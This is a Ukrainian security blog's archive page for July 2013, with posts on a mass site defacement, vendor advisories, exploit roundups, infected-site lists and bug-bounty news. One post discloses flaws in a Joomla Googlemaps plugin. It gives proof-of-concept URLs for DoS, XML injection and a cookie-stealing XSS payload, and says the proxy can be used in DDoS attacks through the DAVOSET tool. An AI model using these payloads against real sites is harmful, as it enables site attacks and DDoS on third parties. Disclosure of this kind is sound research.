Архів за Липень, 2013

Сьомий масовий взлом сайтів на сервері Delta-X

22:46 18.07.2013

З 04.11.2012 по 18.05.2013 відбувся сьомий масовий взлом сайтів на сервері Delta-X, після шостого взлому сайтів на сервері Delta-X. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сьомий сервер компанії Delta-X. Взлом складався з багатьох окремих дефейсів. 3 сайти були дефейснуті в 2012 році та 35 сайтів в 2013 році.

Всього було взломано 38 сайтів на сервері української компанії Delta-X (IP 91.206.200.120). Це наступні сайти: dianetica.org.ua, dimitrov-rada.gov.ua, www.budivel-energy.com.ua, www.kremdruk.com.ua, alve.com.ua, newmebel.kiev.ua, xn--b1adem3b.zp.ua (двери.zp.ua), hlebopech.com, advokato.in.ua, www.vidradne.com.ua, www.rakushka.org.ua, www.lamontfaibvre.com, www.vyshka.com.ua, www.ecowood.rv.ua, energyclub.com.ua, lads.com.ua, gcard.com.ua, perha-ledi.com.ua, www.ecotour.com.ua, www.interpreter.kh.ua, stm-instrument.com.ua, autosvet.kiev.ua, princess.od.ua, southts.od.ua, vgcity.com.ua, sosna.kiev.ua, tresdias.net.ua, www.imperiasada.com.ua, www.uachina.org, nechaeva.dp.ua, gruzi.dp.ua, www.poskachey.com, www.handmaderabbit.org.ua, taxi-kiev.co.ua, www.akerman.com.ua, webservis.in.ua, korinv.org.ua, suzir.com.ua. Серед них український державний сайт dimitrov-rada.gov.ua.

Дефейси по одному сайту булу проведені хакерами dr.m1st3r, tn_hacker, Bangladesh Cyber Army, s13doeL, Joulex, Yildiray, Game Over, S4V4S, luckybag, 1923Turk, Dr.SHA6H, 7 сайтів хакером Hmei7, 6 сайтів хакером misafir та 14 сайтів хакером Sejeal.

Враховуючи велику кількість окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів.

Численні уразливості в Adobe ColdFusion

20:08 18.07.2013

Виявлені численні уразливості безпеки в Adobe ColdFusion.

Уразливі версії: Adobe ColdFusion 9.0, ColdFusion 10.

Виконання коду, DoS.

  • Security update: Hotfix available for ColdFusion (деталі)
  • Security update: Hotfixes available for ColdFusion (деталі)

Добірка уразливостей

17:20 18.07.2013

В даній добірці уразливості в веб додатках:

Експлоіт для Internet Explorer 6-10

22:49 17.07.2013

Продовжуючи розпочату традицію, після попереднього відео про витік httpOnly кукі в Apache, пропоную нове відео на веб секюріті тематику. Цього разу відео про експлоіт для Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo

В даному відео ролику демонструється використання Metasploit Framework для проведення атаки на уразливість в Internet Explorer 6, 7, 8, 9 і 10. В Metasploit створюється і запускається експлоіт для IE, який призводить до віддаленого виконання коду в Internet Explorer при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Численні уразливості в Adobe Shockwave Player

20:08 17.07.2013

Виявлені численні уразливості безпеки в Adobe Shockwave Player.

Уразливі продукти: Adobe Shockwave Player 12.0.

Пошкодження пам’яті, виконання коду.

  • Security update available for Adobe Shockwave Player (деталі)

Добірка експлоітів

17:26 17.07.2013

В даній добірці експлоіти в веб додатках:

  • McAfee ePO 4.6.6 - Multiple Vulnerabilities (деталі)
  • Remote Desk Top denial of service vulnerability (perl & python) (деталі)
  • OpenSSH 6.0p1 Backdoor Patch 1.2 Vulnerability 0day (деталі)
  • HP Intelligent Management Center UAM Buffer Overflow Vulnerability (деталі)
  • Squid 3.3.5 Denial Of Service Vulnerability (деталі)

Інфіковані сайти №165

22:43 16.07.2013

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://vodgosp.if.ua - інфікований державний сайт - інфекція була виявлена 19.05.2013. Зараз сайт не входить до переліку підозрілих.
  • http://upszn-sumy.gov.ua - інфікований державний сайт - інфекція була виявлена 01.06.2013. Зараз сайт не входить до переліку підозрілих.
  • http://alupro.ua - інфекція була виявлена 15.07.2013. Зараз сайт входить до переліку підозрілих.
  • http://volynnews.com - інфекція була виявлена 21.04.2013. Зараз сайт не входить до переліку підозрілих.
  • http://regional.com.ua - інфекція була виявлена 05.07.2013. Зараз сайт не входить до переліку підозрілих.

Уразливості в Adobe Flash Player

19:32 16.07.2013

Виявлені численні уразливості безпеки в Adobe Flash Player.

Уразливі продукти: Adobe Flash Player 11.7, AIR 3.7.

Численні пошкодження пам’яті, виконання коду.

  • Security updates available for Adobe Flash Player (деталі)
  • Security updates available for Adobe Flash Player (деталі)
  • Security updates available for Adobe Flash Player (деталі)

Численні уразливості в Googlemaps для Joomla

16:28 16.07.2013

У липні, 15.07.2013, я знайшов Denial of Service, XML Injection, Cross-Site Scripting та Full path disclosure уразливості в Googlemaps плагіні для Joomla. Про що найближчим часом повідомлю розробникам веб додатку.

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

Можна включати зовнішні xml-файли. Що також може бути використано для XSS атаки:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Окрім plugin_googlemap2_proxy.php, також трапляється plugin_googlemap3_proxy.php (але він має інший шлях на сайтах).

Уразливі Googlemaps plugin for Joomla версії 2.x, 3.x та потенційно попередні версії. В новій версії DAVOSET я додам чимало сайтів з цим Googlemaps плагіном.

Новини: винагороди за уразливості, українські вірмейкери та Microsoft

22:44 13.07.2013

За повідомленням www.xakep.ru, виплата винагород за уразливості дуже вигідна компаніям.

Учені з Каліфорнійського університету в Берклі провели емпіричне дослідження ефективності програм грошових винагород за уразливості. Як відомо, подібні програми діють у Mozilla, Google, Facebook, Microsoft та інших компаніях: усі вони виплачують винагороду хакерам, що знайдуть небезпечні уразливості у фірмових програмних продуктах.

Як з’ясували дослідники, подібні програми надзвичайно ефективні. За звітний період 27,5% усіх закритих уразливостей у браузері Chrome (371 з 1347) сталі відомі саме завдяки програмі винагород за баги, у Firefox - 24,1% (148 з 613), що теж хороший показник.

Те, що приблизно за три роки у Chrome було знайдено 1347 уразливостей, а у Firefox 613 уразливостей свідчить про рівень дірявості цих браузерів. Особливо виділяється Chrome - за той же період в ньому було знайдено в 2,2 рази більше дірок, ніж у Firefox. При тому, що в своїх офіційних анонсах релізів браузера Google не згадав про таку кількість уразливостей, переважно він згадував лише про дірки знайдені по програмі виплат (що менше третини від всіх знайдених дірок). Не кажучи про всі ті випадки, коли розробники браузерів приховано виправили повідомлені мною уразливості. Тобто про переважну більшість уразливостей Гугл навіть не згадав, приховавши від людей справжню ситуацію з низьким рівнем безпеки їхнього браузера.

За повідомленням ain.ua, київський суд засудив трьох хакерів до 5 років в’язниці за віруси.

Печерський райсуд Києва засудив до кримінальної відповідальності трьох хакерів, що поширювали вірус Carberp. Вірус призначався для крадіжки коштів з рахунків клієнтів кредитно-фінансових установ, зокрема - банків.

Учасників хакерської групи визнали винними в злочині по ч.2 ст. 361-1 Кримінального кодексу. Вірмейкерів засудили до п’яти років позбавлення волі з відстрочкою в три роки.

За повідомленням www.xakep.ru, Microsoft виплатила першу нагороду за уразливість в IE11.

18 червня компанія Microsoft оголосила про запуск трьох програм Microsoft Security Bounty, по яких компанія вперше у своїй історії обіцяє платити хакерам за інформацію про небезпечні уразливості у Windows 8.1 та Internet Explorer 11.

Старший стратег по інформаційній безпеці Microsoft Кеті Муссуріс пише в офіційному блозі, що хакерське співтовариство “з ентузіазмом” сприйняло нову програму виплат винагород. За перші два тижні її дії було подано “більше десяти заявок з описом уразливостей”, що більше ніж у два рази перевищує нормальний потік повідомлень про баги. Отже, 10 липня Microsoft прийняла рішення здійснити першу виплату.

Раніше я вже писав про програми винагород за уразливості від Microsoft. Компанія зрозуміла переваги таких програм і в червні запустила власні програми. Й результати не забарилися.